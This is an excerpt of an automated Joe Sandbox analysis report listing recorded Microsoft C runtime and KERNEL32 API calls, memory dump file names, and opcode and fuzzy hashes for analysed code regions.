                                                                                                          • _wcsdup.MSVCR100(?,00000000,-00000002,6FE25BD0), ref: 6FDCCBF8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcscmp$_wcsdup
                                                                                                          • String ID:
                                                                                                          • API String ID: 4151667949-0
                                                                                                          • Opcode ID: 2100e5c38f3f90678d60ed0acfa4c022b492f1ab029210405b300781f0a60622
                                                                                                          • Instruction ID: 5b3dfbbb8c219164ecb82728f44df772e4c98b29bb34872bfe4333fe8d9796ec
                                                                                                          • Opcode Fuzzy Hash: 2100e5c38f3f90678d60ed0acfa4c022b492f1ab029210405b300781f0a60622
                                                                                                          • Instruction Fuzzy Hash: A3515E32904351EADB914FB99A8059E77BDEF01374731461BEF64EB180EF30F9829692
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fileno
                                                                                                          • String ID:
                                                                                                          • API String ID: 467780811-0
                                                                                                          • Opcode ID: 8182bdb95046fefc0ba30e1fe674e7df630c8df4cfcc1974a4de04af5bffee20
                                                                                                          • Instruction ID: 2e972cab95e3ca52064058987d4d17a5677a5bcee18e30a280a098b3f41be71c
                                                                                                          • Opcode Fuzzy Hash: 8182bdb95046fefc0ba30e1fe674e7df630c8df4cfcc1974a4de04af5bffee20
                                                                                                          • Instruction Fuzzy Hash: 8B510072504701DBCBA19F38D844BAA77E4BF12328B108A2AE4B9DB2D0E736F541CB55
                                                                                                          APIs
                                                                                                          • memcpy_s.MSVCR100(?,?,?,?), ref: 6FD92B77
                                                                                                          • _errno.MSVCR100 ref: 6FDA8C29
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDA8C34
                                                                                                          • memset.MSVCR100(?,00000000,?), ref: 6FDA8C47
                                                                                                          • _fileno.MSVCR100(?,?,?), ref: 6FDA8CA3
                                                                                                          • _read.MSVCR100(00000000,?,?), ref: 6FDA8CAA
                                                                                                          • memset.MSVCR100(?,00000000,000000FF), ref: 6FDA8CD4
                                                                                                          • _errno.MSVCR100 ref: 6FDA8CDC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errnomemset$_fileno_invalid_parameter_noinfo_readmemcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 97549664-0
                                                                                                          • Opcode ID: 9533a4b58b6482e30dfef67ed36a6f0b5c1fcf0c731f807410a20d3b90c6e9c1
                                                                                                          • Instruction ID: 0ef8b02565bb58ccd3ecdfe4c305d4af2108edad037510d8438492937517707c
                                                                                                          • Opcode Fuzzy Hash: 9533a4b58b6482e30dfef67ed36a6f0b5c1fcf0c731f807410a20d3b90c6e9c1
                                                                                                          • Instruction Fuzzy Hash: D4510134A06309EBCB908FB8C94468EB7B5AF41329F10872AE874A72D0D731FA40CF51
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,00000010,6FDB8C3B,00000000,?,6FDC0AE8,?,?,?,00000000), ref: 6FDC0CFF
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(0000000C), ref: 6FDC0D3F
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(00000120), ref: 6FDC0D92
                                                                                                          • memset.MSVCR100(00000000,00000000,00000120), ref: 6FDC0DA4
                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FDC0DC9
                                                                                                          • memset.MSVCR100(00000020,00000000,00000100), ref: 6FDC0DDD
                                                                                                          • SetEvent.KERNEL32(?), ref: 6FDC0E84
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FDC0E91
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6FDC0EB5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@CriticalEventSectionmemset$CloseCreateEnterHandleLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 3406441110-0
                                                                                                          • Opcode ID: 633e5d4d1c586da1e4b671be73aad7c55987192e86563184d317d57a95431f94
                                                                                                          • Instruction ID: 38910e150f89eaf27bb9259e25ec1c6a696a4239f9ad738512f0761c6ab0a004
                                                                                                          • Opcode Fuzzy Hash: 633e5d4d1c586da1e4b671be73aad7c55987192e86563184d317d57a95431f94
                                                                                                          • Instruction Fuzzy Hash: 965169B0A00712DFD764CF68C494B9AB7F8FF09354F00866AE899DB690D730B950CBA1
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(6FD908FE,?,?,?,6FD908FE,00000040,?), ref: 6FD8ED27
                                                                                                          • _write.MSVCR100(6FD908FE,FFFF9B4B,00000000,00000000,6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FD8ED95
                                                                                                          • __p__iob.MSVCR100(6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FD9276F
                                                                                                          • __p__iob.MSVCR100(6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FD9277F
                                                                                                          • _errno.MSVCR100(?,?,?,6FD908FE,00000040,?), ref: 6FDA88CD
                                                                                                          • _errno.MSVCR100(?,?,?,6FD908FE,00000040,?), ref: 6FDA88E4
                                                                                                          • _isatty.MSVCR100(6FD908FE,6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FDA890B
                                                                                                          • _lseeki64.MSVCR100(6FD908FE,00000000,00000000,00000002,00000000,6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FDA8928
                                                                                                          • _write.MSVCR100(6FD908FE,00000040,00000001,00000000,6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FDA8948
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __p__iob_errno_write$_fileno_isatty_lseeki64
                                                                                                          • String ID:
                                                                                                          • API String ID: 951745809-0
                                                                                                          APIs
                                                                                                          • wcstombs_s.MSVCR100(?,00000000,00000000,?,7FFFFFFF,?,?,?,?,?,?,?,6FDFE618,00000010), ref: 6FDFE532
                                                                                                            • Part of subcall function 6FD85E00: _wcstombs_s_l.MSVCR100(?,?,?,?,?,00000000), ref: 6FD85E16
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFE54D
                                                                                                          • _calloc_crt.MSVCR100(?,00000001), ref: 6FDFE55C
                                                                                                          • wcstombs_s.MSVCR100(00000000,00000000,?,?,000000FF), ref: 6FDFE571
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFE58C
                                                                                                          • strlen.MSVCR100(00000000,?,?,?,?,?,?,?,6FDFE618,00000010), ref: 6FDFE5AA
                                                                                                          • free.MSVCR100(00000000,?,?,?,?,?,?,?,6FDFE618,00000010), ref: 6FDFE5CA
                                                                                                          • _errno.MSVCR100(00000000,?,?,?,?,?,?,?,6FDFE618,00000010), ref: 6FDFE5CF
                                                                                                          • strlen.MSVCR100(00000000,00000000,00000000,?,?,?,?,?,?,?,6FDFE618,00000010), ref: 6FDFE5DE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: freestrlenwcstombs_s$_calloc_crt_errno_invoke_watson_wcstombs_s_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 1663103391-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?), ref: 6FDE0D69
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6FDE0D74
                                                                                                          • _errno.MSVCR100(?,?,?), ref: 6FDE0D9F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?), ref: 6FDE0DAA
                                                                                                          • _strncoll_l.MSVCR100(?,?,?,?,?,?,?), ref: 6FDE0DC0
                                                                                                          • _mbsnbcnt_l.MSVCR100(?,?,?,?,?,?), ref: 6FDE0DD0
                                                                                                            • Part of subcall function 6FDE0433: _errno.MSVCR100(?), ref: 6FDE0453
                                                                                                            • Part of subcall function 6FDE0433: _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDE045E
                                                                                                          • _mbsnbcnt_l.MSVCR100(?,?,?,?,?,?,?,?,?), ref: 6FDE0DDE
                                                                                                          • __crtCompareStringA.MSVCR100(?,?,00001000,?,?,?,00000000,?,?,?,?,?,?,?), ref: 6FDE0DFB
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6FDE0E07
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo$_mbsnbcnt_l$CompareString__crt_strncoll_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 1599563686-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDC2407: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,00000000,6FDBD7F5,00000000,?,00000000,00000000), ref: 6FDC2439
                                                                                                            • Part of subcall function 6FDC2407: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001,?,00000000,00000000), ref: 6FDC2494
                                                                                                            • Part of subcall function 6FDC2407: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001,?,00000000,00000000), ref: 6FDC24A3
                                                                                                            • Part of subcall function 6FDC2407: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24B2
                                                                                                            • Part of subcall function 6FDC2407: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24C1
                                                                                                            • Part of subcall function 6FDC2407: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24D0
                                                                                                            • Part of subcall function 6FDC2407: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24DF
                                                                                                            • Part of subcall function 6FDC2407: GetCurrentThread.KERNEL32 ref: 6FDC24FD
                                                                                                            • Part of subcall function 6FDC2407: GetThreadPriority.KERNEL32(00000000), ref: 6FDC2504
                                                                                                            • Part of subcall function 6FDBF0E7: EnterCriticalSection.KERNEL32(6FDBD7C5,00000008,6FDC8EA2), ref: 6FDBF100
                                                                                                            • Part of subcall function 6FDBF0E7: ??2@YAPAXI@Z.MSVCR100(00000024), ref: 6FDBF112
                                                                                                            • Part of subcall function 6FDBF0E7: ??2@YAPAXI@Z.MSVCR100(00000030), ref: 6FDBF137
                                                                                                            • Part of subcall function 6FDBF0E7: LeaveCriticalSection.KERNEL32(?), ref: 6FDBF159
                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FDC8EA6
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC8EB6
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC8ECE
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDC8EDC
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC8EF9
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC8F11
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC8F3B
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC8F53
                                                                                                          • InitializeSListHead.KERNEL32(000000E8), ref: 6FDC8F6C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Policy$Concurrency@@$ElementKey@2@@Policy@SchedulerValue@$??0scheduler_resource_allocation_error@CriticalErrorLastSection$??2@InitializeThread$CountCreateCurrentEnterEventExceptionHeadLeaveListPrioritySpinThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3885097699-0
                                                                                                          APIs
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(00000024,0000003C,6FDC1EC2,?,?,?,?,?,6FDC03E2,?,00000000,6FE255E0,0000000C,6FDC0342,?,?), ref: 6FDC1ED7
                                                                                                            • Part of subcall function 6FD8232B: malloc.MSVCR100(?), ref: 6FD82336
                                                                                                          • memcpy.MSVCR100(00000000,6FE27310,00000024,0000003C,6FDC1EC2,?,?,?,?,?,6FDC03E2,?,00000000,6FE255E0,0000000C,6FDC0342), ref: 6FDC1EF4
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,?,6FE20DC8,?,00000002,00000001), ref: 6FDC1F27
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20DC8,?,00000002,00000001), ref: 6FDC1F3C
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,6FDB3A50,6FE20DAC,?), ref: 6FDC1F5B
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001), ref: 6FDC1F7E
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001), ref: 6FDC1F89
                                                                                                          • ??0invalid_scheduler_policy_thread_specification@Concurrency@@QAE@XZ.MSVCR100(00000002,00000001), ref: 6FDC1F9F
                                                                                                          • ??0invalid_scheduler_policy_value@Concurrency@@QAE@XZ.MSVCR100(?,00000002,00000001), ref: 6FDC1FBB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency@@Policy$??0exception@std@@ElementKey@2@@Policy@SchedulerValue@$??0invalid_scheduler_policy_thread_specification@??0invalid_scheduler_policy_value@??2@ExceptionThrowmallocmemcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 554869834-0
                                                                                                          APIs
                                                                                                          • __unDName.MSVCR100(00000000,?,00000000,?,?,00002800,6FDF4DE8,0000000C,6FDF3731,?,?), ref: 6FDF4D1F
                                                                                                            • Part of subcall function 6FD944CA: _lock.MSVCR100(00000005,6FD94558,00000064), ref: 6FD944ED
                                                                                                          • strlen.MSVCR100(00000000), ref: 6FDF4D36
                                                                                                          • _lock.MSVCR100(0000000E), ref: 6FDF4D54
                                                                                                          • malloc.MSVCR100(00000008), ref: 6FDF4D64
                                                                                                          • malloc.MSVCR100(-00000003), ref: 6FDF4D74
                                                                                                          • strcpy_s.MSVCR100(00000000,-00000003,?), ref: 6FDF4D86
                                                                                                          • free.MSVCR100(?), ref: 6FDF4DBB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _lockmalloc$Name__unfreestrcpy_sstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3329257654-0
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FD8ACE4
                                                                                                          • __doserrno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD1D
                                                                                                          • _errno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD25
                                                                                                          • _errno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD3B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD46
                                                                                                          • __doserrno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD4D
                                                                                                          • _errno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD55
                                                                                                          • _errno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD62
                                                                                                          • __doserrno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD6D
                                                                                                            • Part of subcall function 6FD8A4DF: EnterCriticalSection.KERNEL32(00000108,6FD8A540,0000000C,6FD8ECC3,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?), ref: 6FD8A530
                                                                                                            • Part of subcall function 6FD8AB09: ReadFile.KERNEL32(?,00000040,?,?,00000000,?,?,?), ref: 6FD8ABCF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$CriticalEnterFileReadSection_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 590220429-0
                                                                                                          • Opcode ID: 7e41fb7b7d20bbed0b720fdbf19dffeca7514504fd5640546fc4cfdd1370b471
                                                                                                          • Instruction ID: cca8b3b8b7eb68fdc9c3cbe504dd1e3fc49f4626728dc9cbcf524023bfc25315
                                                                                                          • Opcode Fuzzy Hash: 7e41fb7b7d20bbed0b720fdbf19dffeca7514504fd5640546fc4cfdd1370b471
                                                                                                          • Instruction Fuzzy Hash: 9A21AE75841349EFEB92AFB8C98076D37A0AF02329F114782D4305B1E1DBB9B9518BB5
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast_errno$CloseCodeExitHandleObjectProcessSingleWait__doserrno_dosmaperr
                                                                                                          • String ID:
                                                                                                          • API String ID: 4235994010-0
                                                                                                          • Opcode ID: 4ce387739b2917e9ecedaceff79002681a2271e207c2b3545a5615512d21f28a
                                                                                                          • Instruction ID: bb793f77a8de08412e64b29ed7184ae1bf88679ffbfb46000284ceeb31a68eba
                                                                                                          • Opcode Fuzzy Hash: 4ce387739b2917e9ecedaceff79002681a2271e207c2b3545a5615512d21f28a
                                                                                                          • Instruction Fuzzy Hash: 48012D75504715FBD7A05F758C84A4A7BACAF0737AB144316F8398B2D0DB34B8418BA1
                                                                                                          APIs
                                                                                                          • DecodePointer.KERNEL32(00D022F8,00000014,00D0148A,?), ref: 00D013F4
                                                                                                          • _onexit.MSVCR100(?), ref: 00D01401
                                                                                                          • _lock.MSVCR100(00000008), ref: 00D0140C
                                                                                                          • DecodePointer.KERNEL32 ref: 00D0141C
                                                                                                          • DecodePointer.KERNEL32 ref: 00D01427
                                                                                                          • EncodePointer.KERNEL32(?,?,?), ref: 00D0143D
                                                                                                          • __dllonexit.MSVCR100(00000000), ref: 00D01440
                                                                                                          • EncodePointer.KERNEL32(?), ref: 00D0144E
                                                                                                          • EncodePointer.KERNEL32(?), ref: 00D01458
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612452283.0000000000D01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D00000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612359297.0000000000D00000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000009.00000002.30612550523.0000000000D02000.00000004.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000009.00000002.30612649247.0000000000D04000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_d00000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Pointer$DecodeEncode$__dllonexit_lock_onexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 3085583964-0
                                                                                                          • Opcode ID: 5a8b971a6ef76a0edadc078b28ef8bcac0af808f16f574c78da9e8c491eba70e
                                                                                                          • Instruction ID: d0ec82cdab29bfdf821296d56c2cee437ee2118f7a43586642f1d1750d6db249
                                                                                                          • Opcode Fuzzy Hash: 5a8b971a6ef76a0edadc078b28ef8bcac0af808f16f574c78da9e8c491eba70e
                                                                                                          • Instruction Fuzzy Hash: F901E275C11218AEDB01AFA4EC45BED7AB9FB48321F544226E418E22B0DB758A049FB0
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(?,?,00000000,00000000), ref: 6FDCE8BC
                                                                                                          • _errno.MSVCR100(?,?,00000000,00000000), ref: 6FDCE8C3
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,00000000,00000000), ref: 6FDCE8CD
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,?,00000000,00000000), ref: 6FDCE8E2
                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000), ref: 6FDCE8ED
                                                                                                          • _dosmaperr.MSVCR100(00000000,?,00000000,00000000), ref: 6FDCE8F4
                                                                                                          • _errno.MSVCR100(?,00000000,00000000), ref: 6FDCE8FA
                                                                                                          Memory Dump Source
